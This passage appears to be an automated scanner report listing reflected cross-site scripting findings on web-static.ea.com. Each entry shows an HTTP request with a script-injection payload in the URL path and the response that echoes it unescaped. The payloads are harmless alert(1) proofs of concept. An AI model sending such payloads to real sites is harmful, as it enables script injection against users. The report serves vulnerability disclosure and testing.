Content-Length: 30480
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:48 GMT
Date: Fri, 24 Jun 2011 13:43:48 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/css/390e9"><script>alert(1)</script>ff23a62e26f" />
...[SNIP]...

4.110. http://web-static.ea.com/us/portal/css/localized.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/css/localized.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fda98"><script>alert(1)</script>e79b13c4c5b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/css/fda98"><script>alert(1)</script>e79b13c4c5b?ver=582_en_US HTTP/1.1
Host: web-static.ea.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://web-static.ea.com/us/portal/js/jquery/160c2%22%3E%3Cscript%3Ealert(1)%3C/script%3E31a872bdf89?ver=379_en_US

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30480
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 14:09:14 GMT
Date: Fri, 24 Jun 2011 14:09:14 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/css/fda98"><script>alert(1)</script>e79b13c4c5b" />
...[SNIP]...

4.111. http://web-static.ea.com/us/portal/css/typography.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/css/typography.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85bff"><script>alert(1)</script>152fb70807f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/css/85bff"><script>alert(1)</script>152fb70807f?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30480
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:51 GMT
Date: Fri, 24 Jun 2011 13:43:51 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/css/85bff"><script>alert(1)</script>152fb70807f" />
...[SNIP]...

4.112. http://web-static.ea.com/us/portal/images/TrustELogo.jpg [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/images/TrustELogo.jpg

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16bd3"><script>alert(1)</script>ed9411e988f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/images/16bd3"><script>alert(1)</script>ed9411e988f?ver=582_en_US HTTP/1.1
Host: web-static.ea.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://web-static.ea.com/us/portal/js/jquery/160c2%22%3E%3Cscript%3Ealert(1)%3C/script%3E31a872bdf89?ver=379_en_US

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30483
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 14:09:18 GMT
Date: Fri, 24 Jun 2011 14:09:18 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/images/16bd3"><script>alert(1)</script>ed9411e988f" />
...[SNIP]...

4.113. http://web-static.ea.com/us/portal/images/flag_icons/us.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/images/flag_icons/us.gif

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8205"><script>alert(1)</script>a49f6911d8e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/images/flag_icons/f8205"><script>alert(1)</script>a49f6911d8e?ver=582_en_US HTTP/1.1
Host: web-static.ea.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://web-static.ea.com/us/portal/js/jquery/160c2%22%3E%3Cscript%3Ealert(1)%3C/script%3E31a872bdf89?ver=379_en_US

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30494
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 14:09:19 GMT
Date: Fri, 24 Jun 2011 14:09:19 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/images/flag_icons/f8205"><script>alert(1)</script>a49f6911d8e" />
...[SNIP]...

4.114. http://web-static.ea.com/us/portal/images/icon_downloads.png [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/images/icon_downloads.png

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a513d"><script>alert(1)</script>eb712656cf2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/images/a513d"><script>alert(1)</script>eb712656cf2?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30482
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:50 GMT
Date: Fri, 24 Jun 2011 13:43:50 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/images/a513d"><script>alert(1)</script>eb712656cf2" />
...[SNIP]...

4.115. http://web-static.ea.com/us/portal/images/icon_music.png [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/images/icon_music.png

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e26c9"><script>alert(1)</script>c1203a90d25 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/images/e26c9"><script>alert(1)</script>c1203a90d25?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30483
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:50 GMT
Date: Fri, 24 Jun 2011 13:43:50 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/images/e26c9"><script>alert(1)</script>c1203a90d25" />
...[SNIP]...

4.116. http://web-static.ea.com/us/portal/images/icon_photo.png [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/images/icon_photo.png

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1705"><script>alert(1)</script>a5dc3816470 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/images/c1705"><script>alert(1)</script>a5dc3816470?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30482
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:49 GMT
Date: Fri, 24 Jun 2011 13:43:49 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/images/c1705"><script>alert(1)</script>a5dc3816470" />
...[SNIP]...

4.117. http://web-static.ea.com/us/portal/images/icon_video.png [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/images/icon_video.png

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b756"><script>alert(1)</script>da9a57f928c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/images/1b756"><script>alert(1)</script>da9a57f928c?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30483
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:50 GMT
Date: Fri, 24 Jun 2011 13:43:50 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/images/1b756"><script>alert(1)</script>da9a57f928c" />
...[SNIP]...

4.118. http://web-static.ea.com/us/portal/images/icons/blog-icon.png [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/images/icons/blog-icon.png

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ddaf9"><script>alert(1)</script>086cce64b98 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/images/icons/ddaf9"><script>alert(1)</script>086cce64b98?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30488
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:50 GMT
Date: Fri, 24 Jun 2011 13:43:50 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/images/icons/ddaf9"><script>alert(1)</script>086cce64b98" />
...[SNIP]...

4.119. http://web-static.ea.com/us/portal/images/icons/forum-icon.png [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/images/icons/forum-icon.png

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70d16"><script>alert(1)</script>80d22155cec was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/images/icons/70d16"><script>alert(1)</script>80d22155cec?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30489
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:51 GMT
Date: Fri, 24 Jun 2011 13:43:51 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/images/icons/70d16"><script>alert(1)</script>80d22155cec" />
...[SNIP]...

4.120. http://web-static.ea.com/us/portal/images/icons/podcast-icon.png [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/images/icons/podcast-icon.png

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed389"><script>alert(1)</script>c998434f3c9 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/images/icons/ed389"><script>alert(1)</script>c998434f3c9?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30488
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:52 GMT
Date: Fri, 24 Jun 2011 13:43:52 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/images/icons/ed389"><script>alert(1)</script>c998434f3c9" />
...[SNIP]...

4.121. http://web-static.ea.com/us/portal/images/icons/tips-icon.png [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/images/icons/tips-icon.png

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d1ca"><script>alert(1)</script>cc885772821 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/images/icons/3d1ca"><script>alert(1)</script>cc885772821?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30489
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:51 GMT
Date: Fri, 24 Jun 2011 13:43:51 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/images/icons/3d1ca"><script>alert(1)</script>cc885772821" />
...[SNIP]...

4.122. http://web-static.ea.com/us/portal/images/site_logos/battlefield.jpg [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/images/site_logos/battlefield.jpg

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f1d5"><script>alert(1)</script>43f94145e0b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/images/site_logos/7f1d5"><script>alert(1)</script>43f94145e0b?ver=582_en_US HTTP/1.1
Host: web-static.ea.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://web-static.ea.com/us/portal/js/jquery/160c2%22%3E%3Cscript%3Ealert(1)%3C/script%3E31a872bdf89?ver=379_en_US

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30494
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 14:09:19 GMT
Date: Fri, 24 Jun 2011 14:09:19 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/images/site_logos/7f1d5"><script>alert(1)</script>43f94145e0b" />
...[SNIP]...

4.123. http://web-static.ea.com/us/portal/images/site_logos/command_conquer.jpg [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/images/site_logos/command_conquer.jpg

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c75d4"><script>alert(1)</script>0fd901df3a2 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/images/site_logos/c75d4"><script>alert(1)</script>0fd901df3a2?ver=582_en_US HTTP/1.1
Host: web-static.ea.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://web-static.ea.com/us/portal/js/jquery/160c2%22%3E%3Cscript%3Ealert(1)%3C/script%3E31a872bdf89?ver=379_en_US

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30493
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 14:09:19 GMT
Date: Fri, 24 Jun 2011 14:09:19 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/images/site_logos/c75d4"><script>alert(1)</script>0fd901df3a2" />
...[SNIP]...

4.124. http://web-static.ea.com/us/portal/images/site_logos/ea_sports.jpg [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/images/site_logos/ea_sports.jpg

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21539"><script>alert(1)</script>24d9a87f4b5 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/images/site_logos/21539"><script>alert(1)</script>24d9a87f4b5?ver=582_en_US HTTP/1.1
Host: web-static.ea.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://web-static.ea.com/us/portal/js/jquery/160c2%22%3E%3Cscript%3Ealert(1)%3C/script%3E31a872bdf89?ver=379_en_US

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30494
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 14:09:18 GMT
Date: Fri, 24 Jun 2011 14:09:18 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
